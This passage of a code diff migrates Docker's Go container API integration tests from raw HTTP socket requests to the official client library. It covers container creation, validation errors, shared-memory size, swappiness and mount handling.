c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) - config2 := struct { - Image string - CapAdd []string - CapDrop []string - }{"busybox", []string{"NET_ADMIN", "SYS_ADMIN"}, []string{"SETGID"}} - status, _, err = sockRequest("POST", "/containers/create?name=capaddtest1", config2) + config2 := containertypes.Config{ + Image: "busybox", + } + hostConfig := containertypes.HostConfig{ + CapAdd: []string{"NET_ADMIN", "SYS_ADMIN"}, + CapDrop: []string{"SETGID"}, + } + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config2, &hostConfig, &networktypes.NetworkingConfig{}, "capaddtest1") c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) } // #14915 func (s *DockerSuite) TestContainerAPICreateNoHostConfig118(c *check.C) { testRequires(c, DaemonIsLinux) // Windows only support 1.25 or later - config := struct { - Image string - }{"busybox"} - status, _, err := sockRequest("POST", "/v1.18/containers/create", config) + config := containertypes.Config{ + Image: "busybox", + } + + cli, err := client.NewClientWithOpts(client.FromEnv, client.WithVersion("v1.18")) + c.Assert(err, checker.IsNil) + + _, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "") c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) } // Ensure an error occurs when you have a container read-only rootfs but you @@ -1291,93 +1436,87 @@ func (s *DockerSuite) TestPutContainerArchiveErrSymlinkInVolumeToReadOnlyRootfs( readOnly: true, volumes: defaultVolumes(testVol), // Our bind mount is at /vol2 }) - defer deleteContainer(cID) // Attempt to extract to a symlink in the volume which points to a // directory outside the volume. This should cause an error because the // rootfs is read-only. - query := make(url.Values, 1) - query.Set("path", "/vol2/symlinkToAbsDir") - urlPath := fmt.Sprintf("/v1.20/containers/%s/archive?%s", cID, query.Encode()) - - statusCode, body, err := sockRequest("PUT", urlPath, nil) + var httpClient *http.Client + cli, err := client.NewClient(daemonHost(), "v1.20", httpClient, map[string]string{}) c.Assert(err, checker.IsNil) - if !isCpCannotCopyReadOnly(fmt.Errorf(string(body))) { - c.Fatalf("expected ErrContainerRootfsReadonly error, but got %d: %s", statusCode, string(body)) - } -} - -func (s *DockerSuite) TestContainerAPIGetContainersJSONEmpty(c *check.C) { - status, body, err := sockRequest("GET", "/containers/json?all=1", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - c.Assert(string(body), checker.Equals, "[]\n") + err = cli.CopyToContainer(context.Background(), cID, "/vol2/symlinkToAbsDir", nil, types.CopyToContainerOptions{}) + c.Assert(err.Error(), checker.Contains, "container rootfs is marked read-only") } func (s *DockerSuite) TestPostContainersCreateWithWrongCpusetValues(c *check.C) { // Not supported on Windows testRequires(c, DaemonIsLinux) - c1 := struct { - Image string - CpusetCpus string - }{"busybox", "1-42,,"} - name := "wrong-cpuset-cpus" - status, body, err := sockRequest("POST", "/containers/create?name="+name, c1) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) + defer cli.Close() + + config := containertypes.Config{ + Image: "busybox", + } + hostConfig1 := containertypes.HostConfig{ + Resources: containertypes.Resources{ + CpusetCpus: "1-42,,", + }, + } + name := "wrong-cpuset-cpus" + + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig1, &networktypes.NetworkingConfig{}, name) expected := "Invalid value 1-42,, for cpuset cpus" - c.Assert(getErrorMessage(c, body), checker.Equals, expected) + c.Assert(err.Error(), checker.Contains, expected) - c2 := struct { - Image string - CpusetMems string - }{"busybox", "42-3,1--"} + hostConfig2 := containertypes.HostConfig{ + Resources: containertypes.Resources{ + CpusetMems: "42-3,1--", + }, + } name = "wrong-cpuset-mems" - status, body, err = sockRequest("POST", "/containers/create?name="+name, c2) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig2, &networktypes.NetworkingConfig{}, name) expected = "Invalid value 42-3,1-- for cpuset mems" - c.Assert(getErrorMessage(c, body), checker.Equals, expected) + c.Assert(err.Error(), checker.Contains, expected) } func (s *DockerSuite) TestPostContainersCreateShmSizeNegative(c *check.C) { // ShmSize is not supported on Windows testRequires(c, DaemonIsLinux) - config := map[string]interface{}{ - "Image": "busybox", - "HostConfig": map[string]interface{}{"ShmSize": -1}, + config := containertypes.Config{ + Image: "busybox", + } + hostConfig := containertypes.HostConfig{ + ShmSize: -1, } - status, body, err := sockRequest("POST", "/containers/create", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusInternalServerError) - c.Assert(getErrorMessage(c, body), checker.Contains, "SHM size can not be less than 0") + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "") + c.Assert(err.Error(), checker.Contains, "SHM size can not be less than 0") } func (s *DockerSuite) TestPostContainersCreateShmSizeHostConfigOmitted(c *check.C) { // ShmSize is not supported on Windows testRequires(c, DaemonIsLinux) var defaultSHMSize int64 = 67108864 - config := map[string]interface{}{ - "Image": "busybox", - "Cmd": "mount", + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"mount"}, } - status, body, err := sockRequest("POST", "/containers/create", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusCreated) - - var container containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), check.IsNil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "") c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusOK) - var containerJSON types.ContainerJSON - c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + containerJSON, err := cli.ContainerInspect(context.Background(), container.ID) + c.Assert(err, check.IsNil) c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, defaultSHMSize) @@ -1391,25 +1530,20 @@ func (s *DockerSuite) TestPostContainersCreateShmSizeHostConfigOmitted(c *check. func (s *DockerSuite) TestPostContainersCreateShmSizeOmitted(c *check.C) { // ShmSize is not supported on Windows testRequires(c, DaemonIsLinux) - config := map[string]interface{}{ - "Image": "busybox", - "HostConfig": map[string]interface{}{}, - "Cmd": "mount", + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"mount"}, } - status, body, err := sockRequest("POST", "/containers/create", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusCreated) - - var container containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), check.IsNil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "") c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusOK) - var containerJSON types.ContainerJSON - c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + containerJSON, err := cli.ContainerInspect(context.Background(), container.ID) + c.Assert(err, check.IsNil) c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, int64(67108864)) @@ -1423,25 +1557,24 @@ func (s *DockerSuite) TestPostContainersCreateShmSizeOmitted(c *check.C) { func (s *DockerSuite) TestPostContainersCreateWithShmSize(c *check.C) { // ShmSize is not supported on Windows testRequires(c, DaemonIsLinux) - config := map[string]interface{}{ - "Image": "busybox", - "Cmd": "mount", - "HostConfig": map[string]interface{}{"ShmSize": 1073741824}, + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"mount"}, } - status, body, err := sockRequest("POST", "/containers/create", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusCreated) + hostConfig := containertypes.HostConfig{ + ShmSize: 1073741824, + } - var container containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), check.IsNil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + container, err := cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "") c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusOK) - var containerJSON types.ContainerJSON - c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + containerJSON, err := cli.ContainerInspect(context.Background(), container.ID) + c.Assert(err, check.IsNil) c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, int64(1073741824)) @@ -1455,25 +1588,25 @@ func (s *DockerSuite) TestPostContainersCreateWithShmSize(c *check.C) { func (s *DockerSuite) TestPostContainersCreateMemorySwappinessHostConfigOmitted(c *check.C) { // Swappiness is not supported on Windows testRequires(c, DaemonIsLinux) - config := map[string]interface{}{ - "Image": "busybox", + config := containertypes.Config{ + Image: "busybox", } - status, body, err := sockRequest("POST", "/containers/create", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusCreated) - - var container containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), check.IsNil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "") c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusOK) - var containerJSON types.ContainerJSON - c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + containerJSON, err := cli.ContainerInspect(context.Background(), container.ID) + c.Assert(err, check.IsNil) - c.Assert(*containerJSON.HostConfig.MemorySwappiness, check.Equals, int64(-1)) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.31") { + c.Assert(*containerJSON.HostConfig.MemorySwappiness, check.Equals, int64(-1)) + } else { + c.Assert(containerJSON.HostConfig.MemorySwappiness, check.IsNil) + } } // check validation is done daemon side and not only in cli @@ -1481,42 +1614,43 @@ func (s *DockerSuite) TestPostContainersCreateWithOomScoreAdjInvalidRange(c *che // OomScoreAdj is not supported on Windows testRequires(c, DaemonIsLinux) - config := struct { - Image string - OomScoreAdj int - }{"busybox", 1001} + config := containertypes.Config{ + Image: "busybox", + } + + hostConfig := containertypes.HostConfig{ + OomScoreAdj: 1001, + } + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + name := "oomscoreadj-over" - status, b, err := sockRequest("POST", "/containers/create?name="+name, config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusInternalServerError) + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, name) expected := "Invalid value 1001, range for oom score adj is [-1000, 1000]" - msg := getErrorMessage(c, b) - if !strings.Contains(msg, expected) { - c.Fatalf("Expected output to contain %q, got %q", expected, msg) + c.Assert(err.Error(), checker.Contains, expected) + + hostConfig = containertypes.HostConfig{ + OomScoreAdj: -1001, } - config = struct { - Image string - OomScoreAdj int - }{"busybox", -1001} name = "oomscoreadj-low" - status, b, err = sockRequest("POST", "/containers/create?name="+name, config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusInternalServerError) + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, name) + expected = "Invalid value -1001, range for oom score adj is [-1000, 1000]" - msg = getErrorMessage(c, b) - if !strings.Contains(msg, expected) { - c.Fatalf("Expected output to contain %q, got %q", expected, msg) - } + c.Assert(err.Error(), checker.Contains, expected) } // test case for #22210 where an empty container name caused panic. func (s *DockerSuite) TestContainerAPIDeleteWithEmptyName(c *check.C) { - status, out, err := sockRequest("DELETE", "/containers/", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusBadRequest) - c.Assert(string(out), checker.Contains, "No container name or ID supplied") + defer cli.Close() + + err = cli.ContainerRemove(context.Background(), "", types.ContainerRemoveOptions{}) + c.Assert(err.Error(), checker.Contains, "No such container") } func (s *DockerSuite) TestContainerAPIStatsWithNetworkDisabled(c *check.C) { @@ -1524,31 +1658,33 @@ func (s *DockerSuite) TestContainerAPIStatsWithNetworkDisabled(c *check.C) { testRequires(c, DaemonIsLinux) name := "testing-network-disabled" - config := map[string]interface{}{ - "Image": "busybox", - "Cmd": []string{"top"}, - "NetworkDisabled": true, + + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"top"}, + NetworkDisabled: true, } - status, _, err := sockRequest("POST", "/containers/create?name="+name, config) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, name) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) - status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil) + err = cli.ContainerStart(context.Background(), name, types.ContainerStartOptions{}) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) c.Assert(waitRun(name), check.IsNil) type b struct { - status int - body []byte - err error + stats types.ContainerStats + err error } bc := make(chan b, 1) go func() { - status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil) - bc <- b{status, body, err} + stats, err := cli.ContainerStats(context.Background(), name, false) + bc <- b{stats, err} }() // allow some time to stream the stats from the container @@ -1562,26 +1698,15 @@ func (s *DockerSuite) TestContainerAPIStatsWithNetworkDisabled(c *check.C) { c.Fatal("stream was not closed after container was removed") case sr := <-bc: c.Assert(sr.err, checker.IsNil) - c.Assert(sr.status, checker.Equals, http.StatusOK) - - // decode only one object from the stream - var s *types.Stats - dec := json.NewDecoder(bytes.NewBuffer(sr.body)) - c.Assert(dec.Decode(&s), checker.IsNil) + sr.stats.Body.Close() } } func (s *DockerSuite) TestContainersAPICreateMountsValidation(c *check.C) { - type m mounttypes.Mount - type hc struct{ Mounts []m } - type cfg struct { - Image string - HostConfig hc - } type testCase struct { - config cfg - status int - msg string + config containertypes.Config + hostConfig containertypes.HostConfig + msg string } prefix, slash := getPrefixAndSlashFromDaemonPlatform() @@ -1590,176 +1715,185 @@ func (s *DockerSuite) TestContainersAPICreateMountsValidation(c *check.C) { cases := []testCase{ { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "notreal", - Target: destPath}}}}, - status: http.StatusBadRequest, - msg: "mount type unknown", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "notreal", + Target: destPath, + }, + }, + }, + + msg: "mount type unknown", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "bind"}}}}, - status: http.StatusBadRequest, - msg: "Target must not be empty", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "bind"}}}, + msg: "Target must not be empty", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "bind", - Target: destPath}}}}, - status: http.StatusBadRequest, - msg: "Source must not be empty", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "bind", + Target: destPath}}}, + msg: "Source must not be empty", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "bind", - Source: notExistPath, - Target: destPath}}}}, - status: http.StatusBadRequest, - msg: "bind source path does not exist", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "bind", + Source: notExistPath, + Target: destPath}}}, + msg: "source path does not exist", + // FIXME(vdemeester) fails into e2e, migrate to integration/container anyway + // msg: "bind mount source path does not exist: " + notExistPath, }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "volume"}}}}, - status: http.StatusBadRequest, - msg: "Target must not be empty", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "volume"}}}, + msg: "Target must not be empty", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "volume", - Source: "hello", - Target: destPath}}}}, - status: http.StatusCreated, - msg: "", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "volume", + Source: "hello", + Target: destPath}}}, + msg: "", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "volume", - Source: "hello2", - Target: destPath, - VolumeOptions: &mounttypes.VolumeOptions{ - DriverConfig: &mounttypes.Driver{ - Name: "local"}}}}}}, - status: http.StatusCreated, - msg: "", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "volume", + Source: "hello2", + Target: destPath, + VolumeOptions: &mounttypes.VolumeOptions{ + DriverConfig: &mounttypes.Driver{ + Name: "local"}}}}}, + msg: "", }, } - if SameHostDaemon.Condition() { + if SameHostDaemon() { tmpDir, err := ioutils.TempDir("", "test-mounts-api") c.Assert(err, checker.IsNil) defer os.RemoveAll(tmpDir) cases = append(cases, []testCase{ { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "bind", - Source: tmpDir, - Target: destPath}}}}, - status: http.StatusCreated, - msg: "", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "bind", + Source: tmpDir, + Target: destPath}}}, + msg: "", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "bind", - Source: tmpDir, - Target: destPath, - VolumeOptions: &mounttypes.VolumeOptions{}}}}}, - status: http.StatusBadRequest, - msg: "VolumeOptions must not be specified", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "bind", + Source: tmpDir, + Target: destPath, + VolumeOptions: &mounttypes.VolumeOptions{}}}}, + msg: "VolumeOptions must not be specified", }, }...) } - if DaemonIsLinux.Condition() { + if DaemonIsLinux() { cases = append(cases, []testCase{ { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "volume", - Source: "hello3", - Target: destPath, - VolumeOptions: &mounttypes.VolumeOptions{ - DriverConfig: &mounttypes.Driver{ - Name: "local", - Options: map[string]string{"o": "size=1"}}}}}}}, - status: http.StatusCreated, - msg: "", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "volume", + Source: "hello3", + Target: destPath, + VolumeOptions: &mounttypes.VolumeOptions{ + DriverConfig: &mounttypes.Driver{ + Name: "local", + Options: map[string]string{"o": "size=1"}}}}}}, + msg: "", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "tmpfs", - Target: destPath}}}}, - status: http.StatusCreated, - msg: "", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "tmpfs", + Target: destPath}}}, + msg: "", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "tmpfs", - Target: destPath, - TmpfsOptions: &mounttypes.TmpfsOptions{ - SizeBytes: 4096 * 1024, - Mode: 0700, - }}}}}, - status: http.StatusCreated, - msg: "", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "tmpfs", + Target: destPath, + TmpfsOptions: &mounttypes.TmpfsOptions{ + SizeBytes: 4096 * 1024, + Mode: 0700, + }}}}, + msg: "", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "tmpfs", - Source: "/shouldnotbespecified", - Target: destPath}}}}, - status: http.StatusBadRequest, - msg: "Source must not be specified", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "tmpfs", + Source: "/shouldnotbespecified", + Target: destPath}}}, + msg: "Source must not be specified", }, }...) } + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() for i, x := range cases { c.Logf("case %d", i) - status, b, err := sockRequest("POST", "/containers/create", x.config) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, x.status, check.Commentf("%s\n%v", string(b), cases[i].config)) + _, err = cli.ContainerCreate(context.Background(), &x.config, &x.hostConfig, &networktypes.NetworkingConfig{}, "") if len(x.msg) > 0 { - c.Assert(string(b), checker.Contains, x.msg, check.Commentf("%v", cases[i].config)) + c.Assert(err.Error(), checker.Contains, x.msg, check.Commentf("%v", cases[i].config)) + } else { + c.Assert(err, checker.IsNil) } } } @@ -1774,15 +1908,21 @@ func (s *DockerSuite) TestContainerAPICreateMountsBindRead(c *check.C) { defer os.RemoveAll(tmpDir) err = ioutil.WriteFile(filepath.Join(tmpDir, "bar"), []byte("hello"), 666) c.Assert(err, checker.IsNil) - - data := map[string]interface{}{ - "Image": "busybox", - "Cmd": []string{"/bin/sh", "-c", "cat /foo/bar"}, - "HostConfig": map[string]interface{}{"Mounts": []map[string]interface{}{{"Type": "bind", "Source": tmpDir, "Target": destPath}}}, + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"/bin/sh", "-c", "cat /foo/bar"}, + } + hostConfig := containertypes.HostConfig{ + Mounts: []mounttypes.Mount{ + {Type: "bind", Source: tmpDir, Target: destPath}, + }, } - status, resp, err := sockRequest("POST", "/containers/create?name=test", data) - c.Assert(err, checker.IsNil, check.Commentf(string(resp))) - c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(resp))) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "test") + c.Assert(err, checker.IsNil) out, _ := dockerCmd(c, "start", "-a", "test") c.Assert(out, checker.Equals, "hello") @@ -1794,47 +1934,86 @@ func (s *DockerSuite) TestContainersAPICreateMountsCreate(c *check.C) { destPath := prefix + slash + "foo" var ( - err error testImg string ) - if daemonPlatform != "windows" { - testImg, err = buildImage("test-mount-config", ` + if testEnv.OSType != "windows" { + testImg = "test-mount-config" + buildImageSuccessfully(c, testImg, build.WithDockerfile(` FROM busybox RUN mkdir `+destPath+` && touch `+destPath+slash+`bar CMD cat `+destPath+slash+`bar - `, true) + `)) } else { testImg = "busybox" } - c.Assert(err, checker.IsNil) type testCase struct { - cfg mounttypes.Mount + spec mounttypes.Mount expected types.MountPoint } + var selinuxSharedLabel string + // this test label was added after a bug fix in 1.32, thus add requirements min API >= 1.32 + // for the sake of making test pass in earlier versions + // bug fixed in https://github.com/moby/moby/pull/34684 + if !versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + if runtime.GOOS == "linux" { + selinuxSharedLabel = "z" + } + } + cases := []testCase{ // use literal strings here for `Type` instead of the defined constants in the volume package to keep this honest // Validation of the actual `Mount` struct is done in another test is not needed here - {mounttypes.Mount{Type: "volume", Target: destPath}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, - {mounttypes.Mount{Type: "volume", Target: destPath + slash}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, - {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test1"}, types.MountPoint{Type: "volume", Name: "test1", RW: true, Destination: destPath}}, - {mounttypes.Mount{Type: "volume", Target: destPath, ReadOnly: true, Source: "test2"}, types.MountPoint{Type: "volume", Name: "test2", RW: false, Destination: destPath}}, - {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test3", VolumeOptions: &mounttypes.VolumeOptions{DriverConfig: &mounttypes.Driver{Name: volume.DefaultDriverName}}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", Name: "test3", RW: true, Destination: destPath}}, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath}, + expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath, Mode: selinuxSharedLabel}, + }, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath + slash}, + expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath, Mode: selinuxSharedLabel}, + }, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath, Source: "test1"}, + expected: types.MountPoint{Type: "volume", Name: "test1", RW: true, Destination: destPath, Mode: selinuxSharedLabel}, + }, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath, ReadOnly: true, Source: "test2"}, + expected: types.MountPoint{Type: "volume", Name: "test2", RW: false, Destination: destPath, Mode: selinuxSharedLabel}, + }, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath, Source: "test3", VolumeOptions: &mounttypes.VolumeOptions{DriverConfig: &mounttypes.Driver{Name: volume.DefaultDriverName}}}, + expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", Name: "test3", RW: true, Destination: destPath, Mode: selinuxSharedLabel}, + }, } - if SameHostDaemon.Condition() { + if SameHostDaemon() { // setup temp dir for testing binds tmpDir1, err := ioutil.TempDir("", "test-mounts-api-1") c.Assert(err, checker.IsNil) defer os.RemoveAll(tmpDir1) cases = append(cases, []testCase{ - {mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath}, types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir1}}, - {mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath, ReadOnly: true}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir1}}, + { + spec: mounttypes.Mount{ + Type: "bind", + Source: tmpDir1, + Target: destPath, + }, + expected: types.MountPoint{ + Type: "bind", + RW: true, + Destination: destPath, + Source: tmpDir1, + }, + }, + { + spec: mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath, ReadOnly: true}, + expected: types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir1}, + }, }...) // for modes only supported on Linux - if DaemonIsLinux.Condition() { + if DaemonIsLinux() { tmpDir3, err := ioutils.TempDir("", "test-mounts-api-3") c.Assert(err, checker.IsNil) defer os.RemoveAll(tmpDir3) @@ -1843,19 +2022,40 @@ func (s *DockerSuite) TestContainersAPICreateMountsCreate(c *check.C) { c.Assert(mount.ForceMount("", tmpDir3, "none", "shared"), checker.IsNil) cases = append(cases, []testCase{ - {mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath}, types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir3}}, - {mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3}}, - {mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true, BindOptions: &mounttypes.BindOptions{Propagation: "shared"}}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3, Propagation: "shared"}}, + { + spec: mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath}, + expected: types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir3}, + }, + { + spec: mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true}, + expected: types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3}, + }, + { + spec: mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true, BindOptions: &mounttypes.BindOptions{Propagation: "shared"}}, + expected: types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3, Propagation: "shared"}, + }, }...) } } - if daemonPlatform != "windows" { // Windows does not support volume populate + if testEnv.OSType != "windows" { // Windows does not support volume populate cases = append(cases, []testCase{ - {mounttypes.Mount{Type: "volume", Target: destPath, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, - {mounttypes.Mount{Type: "volume", Target: destPath + slash, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, - {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test4", VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Type: "volume", Name: "test4", RW: true, Destination: destPath}}, - {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test5", ReadOnly: true, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Type: "volume", Name: "test5", RW: false, Destination: destPath}}, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, + expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath, Mode: selinuxSharedLabel}, + }, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath + slash, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, + expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath, Mode: selinuxSharedLabel}, + }, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath, Source: "test4", VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, + expected: types.MountPoint{Type: "volume", Name: "test4", RW: true, Destination: destPath, Mode: selinuxSharedLabel}, + }, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath, Source: 